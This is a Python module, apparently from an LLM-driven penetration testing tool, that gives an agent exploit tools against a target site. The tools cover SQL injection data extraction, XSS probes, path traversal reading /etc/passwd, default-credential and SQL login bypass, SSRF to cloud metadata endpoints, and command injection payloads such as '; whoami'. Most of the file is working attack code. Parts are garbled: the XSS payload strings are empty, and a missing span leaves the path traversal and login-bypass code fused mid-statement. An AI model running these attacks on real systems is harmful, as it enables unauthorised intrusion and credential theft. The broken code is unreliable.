""" agents/exploit_engine.py — Part 3: Exploitation Attempt Engine Accepts Part 2 vuln dict and confirms vulnerabilities with safe PoC exploits. Run standalone: python -m agents.exploit_engine --vulns reports/vulns/vulns_*.json Or via main.py: python main.py --target example.com --parts 1,2,3 """ import re import json import time import socket import argparse import urllib.parse from dataclasses import asdict from typing import Optional import requests from bs4 import BeautifulSoup from rich.panel import Panel from rich.table import Table from langchain_groq import ChatGroq from langchain_openai import ChatOpenAI from langchain.agents import AgentExecutor, create_tool_calling_agent from langchain_core.prompts import ChatPromptTemplate from langchain_core.tools import tool from core.models import ExploitResult, ExploitSession, make_id from core.utils import console, safe_get, safe_post, save_json, save_markdown from core.config import (GROQ_API_KEY, GROQ_MODEL_DEFAULT, GROQ_MODELS, GEMINI_API_KEY, GEMINI_MODEL_DEFAULT, EXPLOIT_DIR, MAX_EXPLOIT_ATTEMPTS, LLM_PROVIDER) # ── Global state ───────────────────────────────────────── session: ExploitSession = None DRY_RUN: bool = False def _add(r: ExploitResult): session.add_result(r) color = {"CONFIRMED":"bold red","FAILED":"dim","SKIPPED":"yellow","ERROR":"orange3"}.get(r.status,"white") console.print(f" [{color}]{r.status:10}[/{color}] {r.vuln_category:15} {r.vuln_title[:55]}") # ══════════════════════════════════════════════════════════ # MODULE 1 — SQLI DATA EXTRACTION # ══════════════════════════════════════════════════════════ SQLI_EXTRACT = [ ("MySQL version", "' UNION SELECT version(),NULL,NULL--", r"(\d+\.\d+\.\d+[^\s]*)"), ("MySQL db name", "' UNION SELECT database(),NULL,NULL--", r"([a-zA-Z0-9_]{3,30})"), ("MySQL tables", "' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database() LIMIT 5--", r"([a-z_]{3,20})"), ("PostgreSQL ver", "' UNION SELECT version(),NULL,NULL--", r"(PostgreSQL\s[\d.]+)"), ("MSSQL version", "' UNION SELECT @@version,NULL,NULL--", r"(Microsoft SQL Server\s[\d]+)"), ("DB error reveal", "'", r"(sql syntax|ORA-|pg_query|unclosed quotation)"), ] DB_ERR = re.compile(r"(sql syntax|mysql_fetch|ORA-\d{5}|pg_query|unclosed quotation|" r"Warning.*mysql|SQLSTATE|Microsoft OLE DB|Invalid query)", re.IGNORECASE) @tool def sqli_extract(url: str, vulnerable_param: str) -> str: """ Confirm SQLi by extracting DB version and table names via safe UNION SELECT. Never modifies data — SELECT only. """ console.print(f"\n[cyan]→ SQLi extract:[/cyan] {url} param={vulnerable_param}") parsed = urllib.parse.urlparse(url) base = urllib.parse.parse_qs(parsed.query) if DRY_RUN: _add(ExploitResult(exploit_id=make_id("sqli_dryrun",url), vuln_title="SQLi extract (dry run)", vuln_category="SQLi", target_url=url, status="SKIPPED", technique="UNION SELECT version(),database()", request_sent=f"[dry-run]", response_snippet="No request sent", impact="DB version, table names, potential full dump.", cvss_score=9.8, severity="CRITICAL", evidence_type="dry_run")) return json.dumps({"status":"dry_run"}) for label, payload, pattern in SQLI_EXTRACT: p = dict(base); p[vulnerable_param] = [payload] test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True))) r = safe_get(test_url) if not r: continue err = DB_ERR.search(r.text) match = re.search(pattern, r.text, re.IGNORECASE) if match or err: extracted = (match or err).group(1) _add(ExploitResult(exploit_id=make_id(label,url), vuln_title=f"SQLi confirmed: {label}", vuln_category="SQLi", target_url=test_url, status="CONFIRMED", technique=f"UNION SELECT in param '{vulnerable_param}'", request_sent=f"GET {test_url[:120]}", response_snippet=f"Extracted: {extracted[:100]}", impact="Full DB enumeration possible — tables, columns, row data, credentials.", cvss_score=9.8, severity="CRITICAL", evidence_type="data_leak" if match else "error_message", notes=f"Payload: {payload}")) return json.dumps({"confirmed":True, "label":label, "extracted":extracted}, indent=2) return json.dumps({"confirmed":False}) # ══════════════════════════════════════════════════════════ # MODULE 2 — XSS POC # ══════════════════════════════════════════════════════════ XSS_POC = [ ('', r'alert.*XSS-POC'), ('', r'onerror=alert'), ('', r'onload=alert'), ] ATTACK_SCENARIOS = { "cookie_theft": '', "session_hijack": '', "phishing_overlay":'', } @tool def xss_exploit_poc(url: str, vulnerable_param: str, param_type: str = "query") -> str: """ Build a working XSS PoC and document cookie theft / session hijack scenarios. Confirms reflection only — does NOT steal cookies. """ console.print(f"\n[cyan]→ XSS PoC:[/cyan] {url} param={vulnerable_param}") if DRY_RUN: _add(ExploitResult(exploit_id=make_id("xss_dryrun",url), vuln_title="XSS PoC (dry run)", vuln_category="XSS", target_url=url, status="SKIPPED", technique="Reflected XSS payload", request_sent="[dry-run]", response_snippet="No request sent", impact="Cookie theft, session hijack, phishing overlay, keylogging.", cvss_score=7.4, severity="HIGH", evidence_type="dry_run")) return json.dumps({"status":"dry_run"}) parsed = urllib.parse.urlparse(url) base = urllib.parse.parse_qs(parsed.query) for payload, pattern in XSS_POC: if param_type == "query": p = dict(base); p[vulnerable_param] = [payload] test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True))) r = safe_get(test_url) else: test_url = url r = safe_post(url, {vulnerable_param: payload}) if not r: continue if payload in r.text and "<script>" not in r.text: _add(ExploitResult(exploit_id=make_id("xss_confirmed",url), vuln_title=f"XSS confirmed — {vulnerable_param}", vuln_category="XSS", target_url=test_url, status="CONFIRMED", technique=f"Reflected XSS via '{vulnerable_param}'", request_sent=f"GET {test_url[:120]}", response_snippet=f"Payload reflected: {payload[:80]}", impact="Cookie theft, session hijack, phishing overlay, keylogging.", cvss_score=7.4, severity="HIGH", evidence_type="reflection", notes=f"Attack scenarios: {list(ATTACK_SCENARIOS.keys())}")) return json.dumps({"confirmed":True, "payload":payload, "attack_scenarios": ATTACK_SCENARIOS}, indent=2) _add(ExploitResult(exploit_id=make_id("xss_failed",url), vuln_title=f"XSS re-test — {vulnerable_param}", vuln_category="XSS", target_url=url, status="FAILED", technique="XSS PoC", request_sent=f"{len(XSS_POC)} payloads", response_snippet="No reflection", impact="Not confirmed", cvss_score=0.0, severity="INFO", evidence_type="none")) return json.dumps({"confirmed":False}) # ══════════════════════════════════════════════════════════ # MODULE 3 — PATH TRAVERSAL / LFI # ══════════════════════════════════════════════════════════ LFI_PAYLOADS = [ ("../../../etc/passwd", r"root:.*:/bin/(bash|sh)"), ("....//....//....//etc/passwd", r"root:.*:/bin/(bash|sh)"), ("%2e%2e%2f%2e%2e%2fetc%2fpasswd", r"root:.*:/bin/(bash|sh)"), # FIXED: Hostname files should contain actual hostnames, not generic patterns # Linux hostnames are typically lowercase alphanumeric with optional hyphens/dots ("../../../etc/hostname", r"^[a-z][a-z0-9\-]{2,63}$"), ("../../../proc/version", r"Linux version \d+"), ("..\\..\\..\\windows\\win.ini", r"\[fonts\]"), ] @tool def path_traversal_probe(url: str, file_param: str = "file") -> str: """ Test for LFI/path traversal — reads /etc/passwd and /etc/hostname only. Never reads sensitive app config. """ console.print(f"\n[cyan]→ Path traversal:[/cyan] {url} param={file_param}") if DRY_RUN: _add(ExploitResult(exploit_id=make_id("lfi_dryrun",url), vuln_title="LFI probe (dry run)", vuln_category="PathTraversal", target_url=url, status="SKIPPED", technique="Traversal sequences", request_sent="[dry-run]", response_snippet="No request sent", impact="Read any file accessible to web server process.", cvss_score=8.6, severity="HIGH", evidence_type="dry_run")) return json.dumps({"status":"dry_run"}) parsed = urllib.parse.urlparse(url) base = urllib.parse.parse_qs(parsed.query) for payload, pattern in LFI_PAYLOADS: p = dict(base); p[file_param] = [payload] test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True))) r = safe_get(test_url) if not r: continue match = re.search(pattern, r.text, re.IGNORECASE) if match: evidence = match.group(0)[:120] # CRITICAL FIX: Validate evidence is NOT from normal HTML responses # Reject if evidence looks like HTML/DOCTYPE/common web strings false_positive_indicators = [ 'doctype', ' str: """ Test admin panels for default credentials and SQL auth bypass. Stops after first confirmed login — never creates accounts. """ console.print(f"\n[cyan]→ Auth bypass:[/cyan] {base_url}") if DRY_RUN: _add(ExploitResult(exploit_id=make_id("auth_dryrun",base_url), vuln_title="Auth bypass (dry run)", vuln_category="AuthBypass", target_url=base_url, status="SKIPPED", technique="Default creds + SQL bypass", request_sent="[dry-run]", response_snippet="No request sent", impact="Full admin panel access.", cvss_score=9.8, severity="CRITICAL", evidence_type="dry_run")) return json.dumps({"status":"dry_run"}) import urllib3; urllib3.disable_warnings() sess = requests.Session(); sess.verify = False sess.headers["User-Agent"] = "Mozilla/5.0" paths = [custom_login_path] if custom_login_path else ADMIN_PATHS for path in paths: login_url = base_url.rstrip("/") + path r = safe_get(login_url) if not r or r.status_code not in (200,301,302): continue soup = BeautifulSoup(r.text, "html.parser") form = soup.find("form") if not form: continue inputs = {i.get("name",""): i.get("value","") for i in form.find_all("input") if i.get("name")} user_field = next((k for k in inputs if any(x in k.lower() for x in ["user","login","email"])), None) pass_field = next((k for k in inputs if any(x in k.lower() for x in ["pass","pwd"])), None) if not user_field or not pass_field: continue action = form.get("action", path) post_url = base_url.rstrip("/")+action if not action.startswith("http") else action for username, password in DEFAULT_CREDS: data = dict(inputs); data[user_field]=username; data[pass_field]=password time.sleep(0.3) try: resp = sess.post(post_url, data=data, timeout=10, allow_redirects=True) body = resp.text.lower() if (any(s in body for s in ["logout","dashboard","welcome","sign out"]) and not any(f in body for f in ["invalid","incorrect","failed"])): _add(ExploitResult(exploit_id=make_id("auth_confirmed",login_url), vuln_title=f"Default credentials: {username}:{password}", vuln_category="AuthBypass", target_url=post_url, status="CONFIRMED", technique=f"Default cred: {username}/{'*'*len(password) or '(empty)'}", request_sent=f"POST {post_url} [{user_field}={username}]", response_snippet=resp.text[:200], impact=f"Full admin access. Read/modify all data, possible RCE via file upload.", cvss_score=9.8, severity="CRITICAL", evidence_type="auth_success", notes=f"Login path: {path}")) return json.dumps({"confirmed":True,"credentials":{"user":username,"pass":password}}) except Exception: pass for user_pl, pass_pl in SQL_BYPASS: data = dict(inputs); data[user_field]=user_pl; data[pass_field]=pass_pl time.sleep(0.3) try: resp = sess.post(post_url, data=data, timeout=10, allow_redirects=True) body = resp.text.lower() if (any(s in body for s in ["logout","dashboard","welcome"]) and not any(f in body for f in ["invalid","incorrect"])): _add(ExploitResult(exploit_id=make_id("sql_auth_bypass",login_url), vuln_title="SQL auth bypass confirmed", vuln_category="AuthBypass", target_url=post_url, status="CONFIRMED", technique=f"SQL injection in login: {user_pl}", request_sent=f"POST {post_url}", response_snippet=resp.text[:200], impact="Auth bypassed via SQLi. Full admin access.", cvss_score=9.8, severity="CRITICAL", evidence_type="auth_success")) return json.dumps({"confirmed":True,"technique":"sql_auth_bypass"}) except Exception: pass return json.dumps({"confirmed":False}) # ══════════════════════════════════════════════════════════ # MODULE 5 — SSRF PROBE # ══════════════════════════════════════════════════════════ SSRF_PARAMS = ["url","redirect","next","image","src","load","fetch","request","uri","resource","link"] CLOUD_META = ["http://169.254.169.254/latest/meta-data/", "http://metadata.google.internal/computeMetadata/v1/"] @tool def ssrf_probe(base_url: str, known_params: str = "") -> str: """Detect SSRF — makes server fetch external/cloud-metadata URLs.""" console.print(f"\n[cyan]→ SSRF probe:[/cyan] {base_url}") if DRY_RUN: _add(ExploitResult(exploit_id=make_id("ssrf_dryrun",base_url), vuln_title="SSRF probe (dry run)", vuln_category="SSRF", target_url=base_url, status="SKIPPED", technique="URL injection in query params", request_sent="[dry-run]", response_snippet="No request sent", impact="Internal network access, cloud credential leak.", cvss_score=8.3, severity="HIGH", evidence_type="dry_run")) return json.dumps({"status":"dry_run"}) params = known_params.split(",") if known_params else SSRF_PARAMS for param in params[:8]: for callback in CLOUD_META: test_url = f"{base_url}{'&' if '?' in base_url else '?'}{param}={urllib.parse.quote(callback)}" r = safe_get(test_url, timeout=6) if not r: continue if re.search(r"(ami-id|instance-id|iam/security-credentials|computeMetadata)", r.text, re.I): _add(ExploitResult(exploit_id=make_id("ssrf_confirmed",base_url), vuln_title=f"SSRF — cloud metadata via '{param}'", vuln_category="SSRF", target_url=test_url, status="CONFIRMED", technique=f"SSRF via '{param}' → {callback}", request_sent=f"GET {test_url[:140]}", response_snippet=r.text[:200], impact="IAM credentials, instance metadata, internal service tokens exposed.", cvss_score=8.3, severity="HIGH", evidence_type="data_leak", notes="Cloud metadata pattern found")) return json.dumps({"confirmed":True,"param":param,"callback":callback}) return json.dumps({"confirmed":False, "params_tested": params[:8]}) # ══════════════════════════════════════════════════════════ # MODULE 6 — COMMAND INJECTION # ══════════════════════════════════════════════════════════ CMDI_PAYLOADS = [ ("; whoami", r"(root|www-data|apache|nginx|nobody|daemon)"), ("| whoami", r"(root|www-data|apache|nginx|nobody|daemon)"), ("$(whoami)", r"(root|www-data|apache|nginx|nobody|daemon)"), ("; id", r"uid=\d+"), ("; hostname", r"[a-zA-Z0-9\-]{3,50}"), ("; sleep 3", None), ("& whoami", r"[a-zA-Z0-9\\]+(\\[a-zA-Z0-9]+)?"), ] @tool def cmdi_probe(url: str, vulnerable_param: Optional[str] = None) -> str: """ Detect OS command injection via output reflection or timing. Only tests safe read-only commands: whoami, id, hostname, sleep. """ console.print(f"\n[cyan]→ Cmd injection:[/cyan] {url}") if DRY_RUN: _add(ExploitResult(exploit_id=make_id("cmdi_dryrun",url), vuln_title="Cmd injection probe (dry run)", vuln_category="CmdInjection", target_url=url, status="SKIPPED", technique="; whoami / sleep timing", request_sent="[dry-run]", response_snippet="No request sent", impact="Remote code execution as web server user.", cvss_score=9.8, severity="CRITICAL", evidence_type="dry_run")) return json.dumps({"status":"dry_run"}) parsed = urllib.parse.urlparse(url) query = urllib.parse.parse_qs(parsed.query) params = [vulnerable_param] if vulnerable_param else list(query.keys())[:5] for param in params: for payload, pattern in CMDI_PAYLOADS: p = dict(query); p[param] = [(p.get(param,["1"])[0]) + payload] test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True))) start = time.time() r = safe_get(test_url) elapsed = time.time() - start if not r: continue if pattern: match = re.search(pattern, r.text) if match: _add(ExploitResult(exploit_id=make_id("cmdi_confirmed",url), vuln_title=f"Cmd injection — {param} (output-based)", vuln_category="CmdInjection", target_url=test_url, status="CONFIRMED", technique=f"Injected `{payload}` into '{param}'", request_sent=f"GET {test_url[:140]}", response_snippet=f"Output: {match.group(0)[:80]}", impact=f"RCE as {match.group(0)}. File read, reverse shell, pivot possible.", cvss_score=9.8, severity="CRITICAL", evidence_type="data_leak", notes=f"Server user: {match.group(0)}")) return json.dumps({"confirmed":True,"type":"output","server_user":match.group(0)}) if "sleep" in payload and elapsed >= 2.5: _add(ExploitResult(exploit_id=make_id("cmdi_timebased",url), vuln_title=f"Cmd injection — {param} (time-based)", vuln_category="CmdInjection", target_url=test_url, status="CONFIRMED", technique=f"Time-based: `{payload}` in '{param}'", request_sent=f"GET {test_url[:140]}", response_snippet=f"Delay: {elapsed:.2f}s", impact="Blind RCE. Out-of-band exfil, reverse shell, persistence.", cvss_score=9.8, severity="CRITICAL", evidence_type="delay", notes=f"Delay: {elapsed:.2f}s")) return json.dumps({"confirmed":True,"type":"time_based","delay":round(elapsed,2)}) return json.dumps({"confirmed":False}) # ══════════════════════════════════════════════════════════ # AGENT # ══════════════════════════════════════════════════════════ SYSTEM_PROMPT = """You are an expert penetration tester in the exploitation phase. ⚠️ Authorized targets only. Confirm vulns — never destroy data or install backdoors. RULES: - Run sqli_extract for each confirmed SQLi finding - Run xss_exploit_poc for each confirmed XSS finding - Run auth_bypass_test if admin paths found - Run ssrf_probe if URL/redirect params exist - Run cmdi_probe if OS command injection is suspected - Max {max_attempts} exploit attempts total - Explain your reasoning before each tool call """.format(max_attempts=MAX_EXPLOIT_ATTEMPTS) def build_agent(llm: ChatGroq) -> AgentExecutor: tools = [sqli_extract, xss_exploit_poc, path_traversal_probe, auth_bypass_test, ssrf_probe, cmdi_probe] prompt = ChatPromptTemplate.from_messages([ ("system", SYSTEM_PROMPT), ("human", "{input}"), ("placeholder", "{agent_scratchpad}"), ]) agent = create_tool_calling_agent(llm, tools, prompt) return AgentExecutor(agent=agent, tools=tools, verbose=True, max_iterations=15) def build_task(target: str, vulns: list, severity_filter: list, dry_run: bool) -> str: filtered = sorted( [v for v in vulns if v.get("severity","INFO") in severity_filter], key=lambda x: -x.get("cvss_score",0) )[:20] return ( f"Target: {target}\n" f"Dry-run: {dry_run}\n\n" f"Vulnerability findings from Part 2:\n" f"{json.dumps(filtered, indent=2)}\n\n" "Prioritise by CVSS score. Explain each exploit attempt before running it." ) def run(vuln_data: dict, model: str = GROQ_MODEL_DEFAULT, severity_filter: list = None, dry_run: bool = False) -> dict: """ Entry point called by main.py. Accepts Part 2 vuln dict, returns exploit session dict. """ global session, DRY_RUN DRY_RUN = dry_run if severity_filter is None: severity_filter = ["CRITICAL", "HIGH"] target = vuln_data.get("target", "unknown") vulns = vuln_data.get("vulnerabilities", []) session = ExploitSession(target=target, dry_run=dry_run) # Initialize LLM based on configured provider if LLM_PROVIDER == "gemini": llm = ChatOpenAI( api_key=GEMINI_API_KEY or "dummy_key", base_url="https://generativelanguage.googleapis.com/v1beta/openai/", model=GEMINI_MODEL_DEFAULT, temperature=0 ) console.print(f"[dim]Using LLM: Gemini ({GEMINI_MODEL_DEFAULT}) - Fallback mode (OpenAI-mode)[/dim]") else: llm = ChatGroq(model=model, api_key=GROQ_API_KEY, temperature=0, max_tokens=4096) console.print(f"[dim]Using LLM: Groq ({model})[/dim]") console.print(f"\n[bold]Part 3 — Exploit engine:[/bold] {target} dry_run={dry_run}") build_agent(llm).invoke({"input": build_task(target, vulns, severity_filter, dry_run)}) session.session_end = __import__("datetime").datetime.utcnow().isoformat() result_dict = { "target": target, "session_start": session.session_start, "session_end": session.session_end, "dry_run": dry_run, "summary": session.summary(), "confirmed_count": len(session.confirmed()), "results": [asdict(r) for r in session.results], } json_path = save_json(result_dict, EXPLOIT_DIR, "exploits", target) console.print(f"[green]✓[/green] Exploit JSON: {json_path}") confirmed = session.confirmed() if confirmed: console.print(f"\n[bold red]{len(confirmed)} vulnerability/vulnerabilities confirmed exploitable:[/bold red]") for r in confirmed: console.print(f" [red]•[/red] {r.vuln_title}") return result_dict # ══════════════════════════════════════════════════════════ # STANDALONE ENTRY # ══════════════════════════════════════════════════════════ if __name__ == "__main__": from core.utils import load_json parser = argparse.ArgumentParser(description="Part 3 — Exploit engine") parser.add_argument("--vulns", required=True, help="Part 2 vuln JSON") parser.add_argument("--model", default=GROQ_MODEL_DEFAULT, choices=list(GROQ_MODELS.keys())) parser.add_argument("--severity", default="CRITICAL,HIGH") parser.add_argument("--dry-run", action="store_true") parser.add_argument("--delay", type=float, default=0.3) args = parser.parse_args() from core.utils import set_delay set_delay(args.delay) run(load_json(args.vulns), args.model, [s.strip().upper() for s in args.severity.split(",")], args.dry_run)